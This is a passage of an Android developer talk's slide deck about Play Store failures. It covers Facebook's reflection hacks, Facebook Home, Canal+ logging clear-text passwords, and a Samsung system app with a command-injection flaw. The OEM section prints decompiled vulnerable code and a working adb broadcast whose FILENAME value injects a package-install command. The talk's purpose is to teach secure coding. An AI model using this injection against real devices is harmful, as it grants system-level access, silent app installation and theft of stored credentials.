![Page 105: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/105.jpg)
« More backwards compatibility for Facebook.
Another day, another private field accessed. »
GIT COMMENTANDROID SOURCE CODE
January 2013
![Page 106: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/106.jpg)
/**
* List of dex/resource (class path) elements.
* Should be called pathElements, but the Facebook app uses reflection
* to modify 'dexElements' (http://b/7726934).
*/
private final Element[] dexElements;
Android source code - DexPathList.javaCommit January 2013
![Page 107: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/107.jpg)
Patch set 2
lets facebook start (at least judging by logcat output)
Android code reviewJanuary 2013
After manual testing
facebook starts, though i don't have an account.
![Page 108: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/108.jpg)
This was not enough
They finally patched Dalvik VMUsing native hot fix to change the LinearAlloc buffer size
![Page 109: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/109.jpg)
I feel dirty
![Page 110: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/110.jpg)
In a nutshell
Modularity saves lifes
Google seems to test some popular apps during integrationSo they don’t break the system apps
Google hires engineers when Facebook hires sculptorsInspired by Sayo Oladeji
![Page 111: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/111.jpg)
FACEBOOK EPISODE 207
![Page 112: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/112.jpg)
![Page 113: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/113.jpg)
FACEBOOK HOME
A lock screen
![Page 114: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/114.jpg)
FACEBOOK HOME
Several services supported
![Page 115: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/115.jpg)
FACEBOOK HOME
And a launcher
![Page 116: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/116.jpg)
FACEBOOK HOME
![Page 117: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/117.jpg)
The problem
The launcher is too simpleNo folderNo widgetNo dock (during first months)
It used to be mandatoryLockscreen + Launcher
FACEBOOK HOME
![Page 118: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/118.jpg)
FACEBOOK HOME
![Page 119: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/119.jpg)
FACEBOOK HOME
![Page 120: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/120.jpg)
FACEBOOK HOME
Opens default launcher
![Page 121: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/121.jpg)
FACEBOOK HOME
Spot the odd one out
![Page 122: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/122.jpg)
ConclusionKeep the platform spiritTo override native OS elements you need first to implement all the basic features the user use to use
Identify your weakest pointsAnd prepare how to limit their impact
FACEBOOK HOME
![Page 123: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/123.jpg)
CANAL PLUS08
![Page 124: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/124.jpg)
![Page 125: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/125.jpg)
CANAL+ TOUCH
Request: https://canalURL.com/1.5/getThmChannel.php...
Request: https://canalURL.com/1.5/getProgramThm.php...
Request: https://canalURL.com/1.4/programRediff.php...
Request: https://canalURL.com/1.5/VOD.php?release=1...
json response : {"token":{"url":"http:\/\/download....
Request: https://canalURL.com/1.4/getChannel.php?SE...
json response: {"token":{"url":"https:\/\/canalURL....
Request: https://canalURL.com/1.5/guideTvChannel.ph...
Request: https://canalURL.com/1.5/programInfo.php?U...
Request: https://canalURL.com/1.5/myTv.php?release=...
This is the logcat
![Page 126: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/126.jpg)
Chatty logsMake reverse engineering easierHTTPS connexionPHP backend All the URLS and parameters are knownSome of the response are known too
CANAL+ TOUCH
![Page 127: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/127.jpg)
Chatty logsCan bring really big security breaches
CANAL+ TOUCH
![Page 128: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/128.jpg)
https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
CANAL+ TOUCH
This is always the logcat
![Page 129: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/129.jpg)
https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
CANAL+ TOUCH
This is always the logcat
Wait WHAT ?!
![Page 130: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/130.jpg)
Shut the fuck up!
Control your log outputEasy method with BuildConfig.DEBUG
Never send clear password over the networkNEVAAAAAAA!!!!
CANAL+ TOUCH
![Page 131: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/131.jpg)
CANAL+ TOUCH
public static final boolean SHOW_LOG = BuildConfig.DEBUG;
public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg);}
Avoid the leak, easily
![Page 132: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/132.jpg)
CANAL+ TOUCH
public static final boolean SHOW_LOG = BuildConfig.DEBUG;
public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg);}
Avoid the leak, easily
And test it during QA
![Page 133: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/133.jpg)
OEM SOFTWARE09
![Page 134: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/134.jpg)
The Android
framework
Many APKsImplement the features
Often have system accessTo use low level features
OEM SOFTWARE
![Page 135: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/135.jpg)
Open bar?
OEM SOFTWARE
![Page 136: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/136.jpg)
Let’s see
OEM SOFTWARE
![Page 137: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/137.jpg)
Android OEM applications(in)security
Talk by ANDRE MOULUQuarkslab
OEM SOFTWARE
![Page 138: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/138.jpg)
MethodologyReverse engineeringUsing Androguard
A custom result environmentManifest analysisCheck for sensitive API usageDiff between OS version (to find patches)
OEM SOFTWARE
![Page 139: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/139.jpg)
The results on Samsung
devices
12 vulnerabilities foundLeak personal informationAccess non-permited featuresSilent SMS controlCode injection...
Similar vulnerabilities on many constructors
OEM SOFTWARE
![Page 140: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/140.jpg)
Gimme more!
OEM SOFTWARE
![Page 141: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/141.jpg)
Search forsharedUserId = systemSensitive user ID
Command executionSensitive usage
OEM SOFTWARE
Find serviceModeApp.apk= Very sensitive app !
![Page 142: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/142.jpg)
OEM SOFTWARE
<receiver name=".FTATDumpReceiver"><intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter><action name="com.android.sec.FAILDUMP"></action>
</intent-filter></receiver>
Receiver declared twice
![Page 143: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/143.jpg)
OEM SOFTWARE
<receiver name=".FTATDumpReceiver"><intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter><action name="com.android.sec.FAILDUMP"></action>
</intent-filter></receiver>
Permission asked for this action
![Page 144: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/144.jpg)
OEM SOFTWARE
<receiver name=".FTATDumpReceiver"><intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action></intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver" permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter><action name="com.android.sec.FAILDUMP"></action>
</intent-filter></receiver>
No permission needed for this action!!
![Page 145: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/145.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
We read the FTATDumpReceiver source code
![Page 146: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/146.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Intercepts the FTAT_DUMP action
![Page 147: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/147.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Concats the FILENAME extra to str3
![Page 148: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/148.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Other concatenations follow
![Page 149: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/149.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Prepares an intent to FTATDumpService
![Page 150: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/150.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Adds the final string to the intent
![Page 151: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/151.jpg)
public void onReceive(Context paramContext, Intent paramIntent) {
String str1 = paramIntent.getAction();if (str1.equals("com.android.sec.FTAT_DUMP")){
String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
[...]String str9 = str8 + [...]Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);localIntent2.putExtra("FILENAME", str9);paramContext.startService(localIntent2);
}[...]
}
OEM SOFTWARE
Starts the FTATDumpService with our FILENAME parameter as extra
![Page 152: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/152.jpg)
public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}
OEM SOFTWARE
We read then the FTATDumpService source code
![Page 153: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/153.jpg)
public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}
OEM SOFTWARE
Extracts the FILENAME extra to str
![Page 154: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/154.jpg)
public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}
OEM SOFTWARE
Opens and starts a new thread
![Page 155: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/155.jpg)
OEM SOFTWARE
public int onStartCommand(Intent paramIntent, ...){ final String str = paramIntent.getStringExtra("FILENAME"); [...] new Thread(new Runnable(){ public void run(){ [...] if(FTATDumpService.this. DoShellCmd("dumpstate > /data/log/" + str + ".log")) FTATDumpService.this.mHandler.sendEmptyMessage(1015); [...] } }).start(); return 0;}
Seems to “do a shell command” with our FILENAME parameter concatenated
![Page 156: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/156.jpg)
OEM SOFTWARE
private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}
This is DoShellCmd function
![Page 157: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/157.jpg)
OEM SOFTWARE
private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}
Creates a shell commandAnd runs it
![Page 158: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/158.jpg)
OEM SOFTWARE
private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}
And our FILENAME parameter is still not modified
![Page 159: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/159.jpg)
OEM SOFTWARE
private boolean DoShellCmd(String paramString){ [...] String[] arrayOfString = new String[3]; arrayOfString[0] = "/system/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = paramString; [...] Runtime.getRuntime().exec(arrayOfString).waitFor(); [...] return true;}
And our FILENAME parameter is still not modified
BINGO!
![Page 160: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/160.jpg)
Access toAll permissions declared by system apps156 for this case
All files belonging to system userWifi keysPassword, PIN, gesture storage...
OEM SOFTWARE
![Page 161: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/161.jpg)
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk; #'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0
OEM SOFTWARE
A simple broadcast for FTAT_DUMP action
![Page 162: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/162.jpg)
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk; #'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0
OEM SOFTWARE
We declare the FILENAME argument
![Page 163: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/163.jpg)
OEM SOFTWARE
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk; #'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0
We point the destination file to null
![Page 164: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/164.jpg)
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk; #'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }Broadcast completed : result=0
OEM SOFTWARE
We execute our system command
![Page 165: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/165.jpg)
Open bar!
OEM SOFTWARE
![Page 166: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/166.jpg)
Moral of the story
It happens at application level
Look after your app’s backdoorsDon’t export local servicesUse a strict permission model
Consider every input as a threatEscape all sensitive parameters you receive
OEM SOFTWARE
![Page 167: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/167.jpg)
![Page 168: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/168.jpg)
Thank You for your time !
http://eyal.fr
SLIDEShttp://bit.ly/andbigfails